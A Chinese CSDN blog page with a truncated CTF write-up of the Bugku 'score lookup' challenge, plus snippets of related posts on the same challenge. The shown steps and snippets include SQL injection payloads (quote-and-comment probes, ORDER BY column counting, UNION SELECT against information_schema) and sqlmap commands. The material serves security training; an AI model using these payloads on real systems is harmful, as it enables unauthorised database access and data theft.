一次简单的sql注入 bugku 成绩查询

最新推荐文章于 2024-08-03 20:34:34 发布
最新推荐文章于 2024-08-03 20:34:34 发布
阅读量1.1k 收藏 4
点赞数 2
文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jzw0831/article/details/127716288
版权
本文详述了一次在Bugku平台上的SQL注入过程,通过盲注技术逐步揭示数据库信息,包括数据库名、表名和数据。重点讨论了为何1'无效而1'#可行、UNION查询的应用及information_schema数据库的作用。最终利用UNION SELECT获取了flag。
摘要由CSDN通过智能技术生成

一个小小的盲注

bugku 成绩查询

注入过程

1.打开页面发现一个成绩查询的页面,很有sql注入的味道

2.输入1、2、3都有回显

3.输入 1' 发现没有回显

4.输入1'#有回显, 1'and 1=1 无回显 ,1'and 1=1# 有回显

5.输入1' order by 1,2,3,4#有回显,1' order by 1,2,3,4,5#无回显(确定是四列)

5.1输入-1' union select 1,2,3,4#确定没过滤,union也能执行

6.-1'union select 1,2,3,group_concat(schema_name)from information_schema.schemata # 查询数据库名skctf

最低0.47元/天 解锁文章
jzw0831
关注
Bugku成绩查询一次简单SQL注入过程
xhxtalent的博客
10-20 522
1很重要,一般来说在数据库中id不会有等于负数的,所以union联合查找前面部分的是错误的,故就是显示后面的查询内容,不然不会显示后面的查询内容的。一共查询到两个表名,分别是fl4g和sc表,我们需要但是flag,很大概率在fl4g表中,所以优先查询fl4g表的内容。查询到字段名为“skctf_flag”,那么就直接查询该字段的数据就能得到想要的了。and 1=2返回错误了,说明存在注入点的。递增上去,如果页面如果出现了错误,那么字段数就是当前的数字减1。分别输入1,2,3返回的是不同人名的成绩单。
Bugku---web---成绩查询
weixin_47450099的博客
06-03 598
sql注入相关知识,内有各种爆破语句
bugku-web-成绩查询
最新发布
m0_52484587的博客
08-03 847
先测试:输入1,2,3分别能查到1,2,3号学生的成绩;输入1’返回异常,输入1’–+返回异常,输入1’ #或者1’-- +返回正常(所以可以断定sql语句的形式是id = ‘input_id’。然后爆表:通过使用 id=-1’ union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()# 得到表名:fl4g,sc。注意要加上 --data=“id=1”
bugku--成绩查询
hxhabcd123的博客
08-28 1540
该题记录暴力破解依次破解数据库名、表名、字段名、字段内容的解题过程,以及采用sqlmap工具解题
Bugku-成绩查询
qq_56611811的博客
05-17 456
进入题目差不多能够猜到是关于sql注入的题,1'没有返回结果,1'#能够成功查询,这说明注释符是有效果的。2.当num是5时无法回显内容,说明表可能有4列。
BugkuCTF SQL注入1
weixin_34397291的博客
05-06 230
前言 写了这么久的web题,算是把它基础部分都刷完了一遍,以下的几天将持续更新BugkuCTF WEB部分的题解,为了不影响阅读,所以每道题的题解都以单独一篇文章的形式发表,感谢大家一直以来的支持和理解,共勉~~~ 我们点开链接,里面有段这样的代码: //过滤sql $array = array('table','union','and','or','load_file','cre...
bugku 成绩查询(sql)
qq_63875498的博客
12-04 823
bugku 成绩查询(sql)
【CTF bugku 成绩查询】关于sql注入
zw05011的博客
01-17 651
知识点 sql注入基础原理(超详细) - 简书一、Sql注入简介 Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最...https://www.jianshu.com/p/078df7a35671通过1和1'查看返回值,确定注入 通过1' order by 1#、1' order by 2#直到确定为几列 通过联合查询 1' union select database(),user()#进行查询
Bugku-web之成绩查询
weixin_42939822的博客
03-14 3475
今天是一道地地道道的sql注入题目,通过手动注入不仅可以加深对于sql语句的应用,也能够通过实战了解sql语句的运作,更好地体会到sql注入漏洞存在的潜在危害!!!ctf小白之旅继续前行!!!
BUGKU-成绩查询
m0_64180167的博客
12-03 928
打开环境 随便输入 发现URL 不传参 怀疑是POST型于是我们查看源代码发现是POST型打开终端因为是POST型 所以有两种方式语法:sqlmap -r "txt地址"kali中要下载数据包 我们在物理windows系统上的BP进行抓取 打包成文件然后把后缀改成.txt 通过共享文件传输到kali中,或者直接从桌面拖到kali桌面中打开sqlmap运行指令sqlmap -r "bugku.txt"于是我们开始爆破库sqlmap -r "bugku.txt" --tables 把库名和表名爆出来了然后我们发
Bugku 成绩查询
m0_63711447的博客
04-07 894
这道题按照正常的SQL注入步骤进行即可,没有绕弯弯的地方 1、打开题目环境,在输入框中输入数字1得到成绩回显,输入2和3也能得到相应的回显 2、测试参数包裹方式,输入1'没有得到回显 输入1'#进行注释,得到回显 3、用order by语句测试有几列,输入1' order by 4#时有回显,order by 5时无回显,说明有四列 4、接下使用联合查询语句测试有几个回显点,注意将前面的参数值置换为空,由图可知有三个回显点 5、查库名 输入-1'union select 1,2,3,g
BugKusql注入
D-R0s1的博客
08-08 888
       今天和大家分享一道BugKu中关于sql注入的题目,在web题中,sql注入的相关知识可以说随处可见了,在这里咱们就就题论题不做其他的拓展和延伸了。        拿到题以后,还是老套路,and 1=1和and 1=2 看看是否带入查询,但是这个题目在?id=1和?id=1'两种条件下都不报错,查看页面源代码发现gb2312于是尝试宽字节注入。?id=1%bf' union sel...
Bugku sql注入
m0_63253040的博客
07-26 1082
过滤了length,like,information,and,union,select,order,where等等。得到数据库后面因为fuzz后发现过滤了太多字符,所以这里根据。用括号绕过空格,我们发现能用的字符有,or,'得到数据表admin和字段名password后。先万能密码试试看,是不等于的意思。是用字典跑出数据表和字段,这里先跳过。提示这题布尔盲注,先fuzz一波。可以确定这里有布尔盲注。去登录账号是admin。最后利用脚本爆出数据库。得到密码bugctf。进入环境是个登录页面。...
【CTF-web】bugku-成绩查询sql注入
Sankkl1的博客
08-17 655
再测试,当id为1’时,无数据,而当id为1’#时,又正确返回了数据,推测构造的数据库查询语句可能是类似。查询skctf库中的表的名称,结果其中有一个表名为fl4g,很可能其中就包含了flag。查询fl4g表中的列名,发现其中有一列的名称为skctf_flag。如上图所示,当id为1时返回名字为“龙龙龙”的成绩单。我们要找到能返回能够返回我们需要的信息的位置,当。时,数据不显示,可以知道一列数据有4列。时,我们可以查询到库名,如下图所示。这样的,其中XX为传入的参数。时,可以正常显示,直到。
bugku--SQL注入((利用脚本))
hxhabcd123的博客
08-28 1702
本文记录利用脚本来解决SQL注入的CTF题
成绩查询SQL注入方法
weixin_44364851的博客
01-20 461
给的初始题目界面时这个样子 通过输入1' #发现有响应,判断应该是SQL注入问题 mysql语句中,order by m是指按照第m列从小到大排序,因此可以分别1’ order by 1#,1’ order by 2#……直到报错为止,从6开始报错可以判断出一共有5列 mysql中database()和user()用来获取数据库名称和数据库用户,因此通过union select来获取这两个信息,通过’ union select 1,2,3,4,5#,其中将database()和user()放入1,2,
SQL参数化查询防止注入的原理解析
"SQL注入是一种常见的安全漏洞,发生在应用程序动态构建SQL语句时,攻击者通过输入恶意数据来篡改原本的SQL命令。参数化查询是预防SQL注入的有效方法,但其工作原理并不广为人知。本文将探讨为什么参数化查询能够...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值